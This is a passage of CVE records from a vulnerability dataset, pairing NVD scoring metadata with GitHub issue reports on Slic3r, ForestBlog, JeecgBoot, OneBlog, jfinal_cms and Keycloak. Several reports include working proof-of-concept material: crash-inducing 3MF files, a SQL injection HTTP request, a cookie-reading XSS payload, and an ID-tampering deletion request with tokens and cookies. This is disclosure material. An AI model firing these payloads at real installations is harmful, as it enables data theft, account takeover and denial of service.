"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Mitigation",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/slic3r/Slic3r/issues/5119"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Mitigation",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/slic3r/Slic3r/issues/5120"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:slic3r:slic3r:1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A80F063E-875F-4590-B370-4A8795AF1F9F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/slic3r/Slic3r/issues/5119 | [
"Issue Tracking",
"Mitigation",
"Patch",
"Third Party Advisory"
] | github.com | [
"slic3r",
"Slic3r"
] | ### Summary
A crafted 3MF XML document can cause a crash due to a NULL pointer dereference during parsing.
### Vulnerable versions
* Slic3r (commit b1a5500f427700ac3dffc0e7d9535ea65f993537)
### Step to reproduce
1. Create the proof-of-concept OBJ file (`3dmodel.3dmodel`):
```xml
<model>
<resources>
<object id="1">
<mesh>
<vertices>
<triangle />
</vertices>
</mesh>
</object>
</resources>
</model>
```
2. Pack the file into a zip archive together with the prerequisite other files from a 3mf file:
```
3D/3dmodel.3dmodel
rels/.rels
[Content_Types].xml
```
3. Rename the zip archive to `nullptr_3mf_triangle.3mf`
4. Execute `slic3r --info nullptr_3mf_triangle.3mf`
5. Observe segmentation fault.
### Example file
[nullptr_3mf_triangle.zip](https://github.com/slic3r/Slic3r/files/7777538/nullptr_3mf_triangle.zip)
### Cause
`get_attribute()` in TMF.cpp returns NULL if the sought attribute is missing. The NULL check at [TMF.cpp:590](https://github.com/slic3r/Slic3r/blob/b1a5500f427700ac3dffc0e7d9535ea65f993537/xs/src/libslic3r/IO/TMF.cpp#L590) is ineffective, since `self->stop()` does not terminate the current function.
Execution continues to line 593, where `atoi` receives a NULL pointer input, and a crash results.
### Impact
Denial of Service.
### Proposed mitigation
Throw an exception in `TMFParserContext::stop()` to ensure that file parsing stops immediately. | NULL pointer dereference in 3MF XML parser (triangle tag without v1/v2/v3 attribute) | https://api.github.com/repos/slic3r/Slic3r/issues/5119/comments | 2 | 2021-12-26T20:37:00Z | 2022-01-31T12:45:37Z | https://github.com/slic3r/Slic3r/issues/5119 | 1,088,840,946 | 5,119 | 3,101 |
CVE-2021-45847 | 2022-01-25T14:15:08.860 | Several missing input validations in the 3MF parser component of Slic3r libslic3r 1.3.0 can each allow an attacker to cause an application crash using a crafted 3MF input file. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Mitigation",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/slic3r/Slic3r/issues/5118"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Mitigation",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/slic3r/Slic3r/issues/5119"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Mitigation",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/slic3r/Slic3r/issues/5120"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Mitigation",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/slic3r/Slic3r/issues/5118"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Mitigation",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/slic3r/Slic3r/issues/5119"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Mitigation",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/slic3r/Slic3r/issues/5120"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:slic3r:slic3r:1.3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A80F063E-875F-4590-B370-4A8795AF1F9F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/slic3r/Slic3r/issues/5120 | [
"Issue Tracking",
"Mitigation",
"Patch",
"Third Party Advisory"
] | github.com | [
"slic3r",
"Slic3r"
] | ### Summary
A crafted 3MF XML document can cause a crash due to a NULL pointer dereference during parsing.
### Vulnerable versions
* Slic3r (commit b1a5500f427700ac3dffc0e7d9535ea65f993537)
### Step to reproduce
1. Create the proof-of-concept OBJ file (`3dmodel.3dmodel`):
```xml
<model>
<resources>
<object id="1">
<mesh>
<vertices>
<slic3r:volume />
</vertices>
</mesh>
</object>
</resources>
</model>
```
2. Pack the file into a zip archive together with the prerequisite other files from a 3mf file:
```
3D/3dmodel.3dmodel
rels/.rels
[Content_Types].xml
```
3. Rename the zip archive to `nullptr_3mf_volume.3mf`
4. Execute `slic3r --info nullptr_3mf_volume.3mf`
5. Observe segmentation fault.
### Example file
[nullptr_3mf_volume.zip](https://github.com/slic3r/Slic3r/files/7777550/nullptr_3mf_volume.zip)
### Cause
`get_attribute()` in TMF.cpp returns NULL if the sought attribute is missing. The constructor of `std::string` is invoked implicitly, leading to a crash (`std::string(NULL)`). The check at [TMF.cpp:602](https://github.com/slic3r/Slic3r/blob/b1a5500f427700ac3dffc0e7d9535ea65f993537/xs/src/libslic3r/IO/TMF.cpp#L602) is ineffective, since it occurs after the NULL pointer is dereferenced.
### Impact
Denial of Service.
### Proposed mitigation
Perform a NULL check on the return values from `get_attribute` before constructing strings from them. Ensure that the NULL check terminates parsing, as proposed in #5118 and #5119. | NULL pointer dereference in 3MF XML parser (slic3r:volume tag without ts/te/modifier attribute) | https://api.github.com/repos/slic3r/Slic3r/issues/5120/comments | 2 | 2021-12-26T20:44:57Z | 2022-01-31T12:46:34Z | https://github.com/slic3r/Slic3r/issues/5120 | 1,088,841,969 | 5,120 | 3,102 |
CVE-2021-46033 | 2022-01-25T15:15:08.160 | In ForestBlog, as of 2021-12-28, File upload can bypass verification. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/saysky/ForestBlog/issues/69"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/saysky/ForestBlog/issues/69"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:forestblog_project:forestblog:-:*:*:*:*:*:*:*",
"matchCriteriaId": "09674756-CCE5-44F4-9CEA-FEFB96615FA7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"434"
] | 434 | https://github.com/saysky/ForestBlog/issues/69 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"saysky",
"ForestBlog"
] | In this code, the verification suffix should verify the file type after the last point:
public final String allowSuffix = ".bmp.jpg.jpeg.png.gif.pdf.doc.zip.rar.gz";
/**
* 上传文件
*
* @param file
* @return
* @throws IOException
*/
@RequestMapping(value = "/img", method = RequestMethod.POST)
public JsonResult uploadFile(@RequestParam("file") MultipartFile file) {
//1.文件后缀过滤,只允许部分后缀
//文件的完整名称,如spring.jpeg
String filename = file.getOriginalFilename();
//文件名,如spring
String name = filename.substring(0, filename.indexOf("."));
//文件后缀,如.jpeg
String suffix = filename.substring(filename.lastIndexOf("."));
if (allowSuffix.indexOf(suffix) == -1) {
return new JsonResult().fail("不允许上传该后缀的文件!");
}
example:


| File upload bypass exists | https://api.github.com/repos/saysky/ForestBlog/issues/69/comments | 0 | 2021-12-28T07:42:20Z | 2022-02-17T05:00:26Z | https://github.com/saysky/ForestBlog/issues/69 | 1,089,678,713 | 69 | 3,103 |
CVE-2021-46089 | 2022-01-25T15:15:08.203 | In JeecgBoot 3.0, there is a SQL injection vulnerability that can operate the database with root privileges. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "HIGH",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "COMPLETE",
"baseScore": 10,
"confidentialityImpact": "COMPLETE",
"integrityImpact": "COMPLETE",
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 10,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/jeecgboot/jeecg-boot/issues/3331"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/jeecgboot/jeecg-boot/issues/3331"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jeecg:jeecg_boot:3.0:*:*:*:*:*:*:*",
"matchCriteriaId": "45720048-60C0-4FA8-AA09-16C8CF329FD3",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"89"
] | 89 | https://github.com/jeecgboot/jeecg-boot/issues/3331 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"jeecgboot",
"jeecg-boot"
] | ##### version: <=3.0
##### precondition: After logged in the website,click 流程管理 proxy burp,the parameter "column" can be made SQL injection.
##### Screenshot & code :
<img width="1240" alt="图片" src="https://user-images.githubusercontent.com/25843151/147641725-71a3c7a3-c4d4-41f8-af76-b875641e2cbf.png">
poc:
```GET /act/process/extActExpression/list?_t=1637890565&column=extractvalue(1,concat(char(126),user()))&order=desc&field=id,,,name,expression,action&pageNo=1&pageSize=10 HTTP/1.1
Host: api.boot.jeecg.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Sign: 7AE7A7990565A3187D8CE30725C82718
X-Timestamp: 20211229152402
X-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJleHAiOjE2NDA3NjI2NTMsInVzZXJuYW1lIjoiamVlY2cifQ.SX0HjEOmrGFDZt-oNUUOlTNYn9ftCOmhQIOgED9HZRM
Tenant-Id: 2
Origin: http://boot.jeecg.com
Referer: http://boot.jeecg.com/
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
Te: trailers
Connection: close
```
| There is an SQL injection vulnerability that can operate the database with root privileges. | https://api.github.com/repos/jeecgboot/JeecgBoot/issues/3331/comments | 3 | 2021-12-29T08:36:51Z | 2022-01-21T02:04:30Z | https://github.com/jeecgboot/JeecgBoot/issues/3331 | 1,090,357,318 | 3,331 | 3,104 |
CVE-2021-46034 | 2022-01-25T16:15:08.797 | A problem was found in ForestBlog, as of 2021-12-29, there is a XSS vulnerability that can be injected through the nickname input box. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/saysky/ForestBlog/issues/70"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/saysky/ForestBlog/issues/70"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:forestblog_project:forestblog:-:*:*:*:*:*:*:*",
"matchCriteriaId": "09674756-CCE5-44F4-9CEA-FEFB96615FA7",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/saysky/ForestBlog/issues/70 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"saysky",
"ForestBlog"
] | There is no character verification for the nickname of the registration interface

The administrator clicks the user function to pop up the XSS prompt box

| XSS vulnerability exists | https://api.github.com/repos/saysky/ForestBlog/issues/70/comments | 0 | 2021-12-29T07:16:11Z | 2022-02-17T05:00:14Z | https://github.com/saysky/ForestBlog/issues/70 | 1,090,318,764 | 70 | 3,105 |
CVE-2021-46085 | 2022-01-25T16:15:08.920 | OneBlog <= 2.2.8 is vulnerable to Insecure Permissions. Low level administrators can delete high-level administrators beyond their authority. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 4,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/zhangyd-c/OneBlog/issues/29"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/zhangyd-c/OneBlog/issues/29"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:oneblog_project:oneblog:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5E0AB4B0-7F87-4DE4-9789-C27A8220F2E5",
"versionEndExcluding": null,
"versionEndIncluding": "2.2.8",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"276"
] | 276 | https://github.com/zhangyd-c/OneBlog/issues/29 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"zhangyd-c",
"OneBlog"
] | [Suggested description]
Insecure Permissions vulnerability exists in OneBlog.Low level administrators can delete high-level administrators beyond their authority (including administrators with the highest authority).
[Vulnerability Type]
Insecure Permissions
[Vendor of Product]
https://github.com/zhangyd-c/OneBlog
[Affected Product Code Base]
<= 2.2.8
[Affected Component]
POST /user/remove HTTP/1.1
Host: localhost:8086
Content-Length: 5
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="92"
Accept: */*
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://localhost:8086
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8086/users
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: navUrl=http://localhost:9105/admin/basic.action; XSRF-TOKEN=010353a5-cfe1-4fa8-9a28-0b9cfb4ca538; cms_token=c820882773ab4b6b9719916981b3e9b7; JSESSIONID=c45212ed-03a9-499c-810b-cf5c28e4d5b1
Connection: close
ids= 3(The IDS value is controllable. Any administrator can add, delete, modify and query the data of other administrator users by modifying the IDS value)
[Attack Type]
Remote
[Vulnerability details]
first, prepare two test accounts with different levels.
Senior administrator admin

Low level administrator root123

Step 2: log in to the system with root123 and enter the user management page

Step 3: click the delete button to directly delete the administrator user admin

Delete succeeded!
In addition, you can also use burpsuite to capture packets and delete any user (including yourself) by modifying the value of ids. This is a logical vulnerability because the default secondary rule of the system is that you cannot delete yourself)
The first step is to log in to the background with root123 account and enter user management.

Step 2: after the packet capturing mode is enabled, click the delete button corresponding to user test

You can delete any user by modifying the value of IDS. Here, I modify the value of IDS to the value of the currently logged in user.

Delete succeeded!
| There is a Insecure Permissions vulnerability exists in OneBlog <= 2.2.8 | https://api.github.com/repos/zhangyd-c/OneBlog/issues/29/comments | 0 | 2021-12-29T09:33:16Z | 2021-12-29T09:33:16Z | https://github.com/zhangyd-c/OneBlog/issues/29 | 1,090,388,202 | 29 | 3,106 |
CVE-2021-46087 | 2022-01-25T16:15:09.013 | In jfinal_cms >= 5.1 0, there is a storage XSS vulnerability in the background system of CMS. Because developers do not filter the parameters submitted by the user input form, any user with background permission can affect the system security by entering malicious code. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "NONE",
"baseScore": 3.5,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:S/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 6.8,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/jflyfox/jfinal_cms/issues/19"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/jflyfox/jfinal_cms/issues/19"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:jflyfox:jfinal_cms:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9EF2DC8E-81C2-4E53-A709-EC9490E00A3F",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "5.1.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/jflyfox/jfinal_cms/issues/19 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"jflyfox",
"jfinal_cms"
] | There is a storage XSS vulnerability in the modification of jfinal_CMS user's personal information. The attacker can insert malicious XSS code into the modification of personal information, and then successfully trigger XSS attack when the administrator user views the user's personal information.
First, register a user test, then enter the personal information page, insert the malicious XSS attack code in the remarks:
payload:
`"><img src=x onerror=alert(document.cookie);><"`

Then use the administrator account to view the user information:

Successfully triggered malicious XSS Code:

Safety advice: strictly filter the user's input
| A Stored XSS vulnerability exists in jfinal_cms v5.1.0 | https://api.github.com/repos/jflyfox/jfinal_cms/issues/19/comments | 1 | 2020-06-03T14:27:59Z | 2021-06-15T03:31:10Z | https://github.com/jflyfox/jfinal_cms/issues/19 | 630,044,323 | 19 | 3,107 |
CVE-2021-4133 | 2022-01-25T20:15:08.607 | A flaw was found in Keycloak in versions from 12.0.0 and before 15.1.1 which allows an attacker with any existing user account to create new default user accounts via the administrative REST API even when new user registration is disabled. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 8,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "secalert@redhat.com",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2033602"
},
{
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/keycloak/keycloak/issues/9247"
},
{
"source": "secalert@redhat.com",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/keycloak/keycloak/security/advisories/GHSA-83x4-9cwr-5487"
},
{
"source": "secalert@redhat.com",
"tags": [
"Not Applicable"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2033602"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/keycloak/keycloak/issues/9247"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/keycloak/keycloak/security/advisories/GHSA-83x4-9cwr-5487"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Not Applicable"
],
"url": "https://www.oracle.com/security-alerts/cpuapr2022.html"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:redhat:keycloak:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A401BE6A-3227-4F4D-9FA8-35B61B86B79A",
"versionEndExcluding": "15.1.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "12.0.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"863"
] | 863 | https://github.com/keycloak/keycloak/issues/9247 | [
"Third Party Advisory"
] | github.com | [
"keycloak",
"keycloak"
] | ### Describe the bug
A incorrect authorization flaw was found in Keycloak 12.0.0, the flaw allows an attacker with any existing user account to create new default user accounts via the administrative REST API even where new user registration is disabled.
Security advisory:
* https://github.com/keycloak/keycloak/security/advisories/GHSA-83x4-9cwr-5487
### Version
12.0.0 up to and including 15.0.0 | Incorrect authorization allows unpriviledged users to create other users | https://api.github.com/repos/keycloak/keycloak/issues/9247/comments | 3 | 2021-12-20T12:37:38Z | 2022-09-11T18:42:20Z | https://github.com/keycloak/keycloak/issues/9247 | 1,084,743,912 | 9,247 | 3,108 |
CVE-2019-25056 | 2022-01-26T05:15:08.847 | In Bromite through 78.0.3904.130, there are adblock rules in the release APK; therefore, probing which resources are blocked and which aren't can identify the application version and defeat the User-Agent protection mechanism. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
